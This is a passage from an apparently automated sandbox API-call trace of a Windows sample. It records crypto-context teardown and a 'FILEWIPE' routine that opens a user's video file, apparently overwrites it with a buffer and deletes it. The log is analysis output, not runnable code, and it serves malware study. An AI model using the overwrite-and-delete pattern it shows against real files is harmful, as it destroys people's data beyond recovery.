lpMsg=0x87f04c) returned 0 [0198.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.713] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0198.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.713] CryptDestroyKey (hKey=0x90af18) returned 1 [0198.713] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.713] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.713] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.713] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.713] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.713] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.713] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.714] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0198.714] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.714] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.714] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.714] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.714] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.714] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0198.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.714] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.714] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.714] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.714] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.714] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.715] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.715] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.715] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.715] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.715] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0198.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.715] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.715] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.715] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0198.715] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.715] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.715] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.716] FreeLibrary (hLibModule=0x74f20000) returned 1 [0198.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0198.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0198.716] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.716] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.716] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.717] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.718] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.719] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.719] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0198.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0198.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.719] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.719] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e7e620, ftCreationTime.dwHighDateTime=0x1d5dfbe, ftLastAccessTime.dwLowDateTime=0xaf27bc50, ftLastAccessTime.dwHighDateTime=0x1d5deed, ftLastWriteTime.dwLowDateTime=0xaf27bc50, ftLastWriteTime.dwHighDateTime=0x1d5deed, nFileSizeHigh=0x0, nFileSizeLow=0x425e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="z4iUj36y_uRj.flv", cAlternateFileName="Z4IUJ3~1.FLV")) returned 0x90af58 [0198.719] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0198.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.720] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.720] CharLowerBuffW (in: lpsz="byte[16990]", cchLength=0xb | out: lpsz="byte[16990]") returned 0xb [0198.720] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.720] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0198.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.720] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.720] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0198.720] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0198.721] FreeLibrary (hLibModule=0x75c90000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0198.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.722] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.722] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.722] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.722] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0198.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.723] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0198.723] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.724] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z4iuj36y_urj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0198.724] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.724] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0198.724] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.724] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.725] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.725] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.744] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.744] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.744] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.744] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0198.744] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.744] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.744] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.744] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.744] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.744] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.744] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", lpFilePart=0x0) returned 0x35 [0198.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e7e620, ftCreationTime.dwHighDateTime=0x1d5dfbe, ftLastAccessTime.dwLowDateTime=0xaf27bc50, ftLastAccessTime.dwHighDateTime=0x1d5deed, ftLastWriteTime.dwLowDateTime=0x1b5a1000, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x425e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="z4iUj36y_uRj.flv", cAlternateFileName="Z4IUJ3~1.FLV")) returned 0x90af58 [0198.745] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z4iuj36y_urj.flv")) returned 1 [0198.747] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e7e620, ftCreationTime.dwHighDateTime=0x1d5dfbe, ftLastAccessTime.dwLowDateTime=0xaf27bc50, ftLastAccessTime.dwHighDateTime=0x1d5deed, ftLastWriteTime.dwLowDateTime=0x1b5a1000, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x425e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="z4iUj36y_uRj.flv", cAlternateFileName="Z4IUJ3~1.FLV")) returned 0 [0198.747] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.747] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 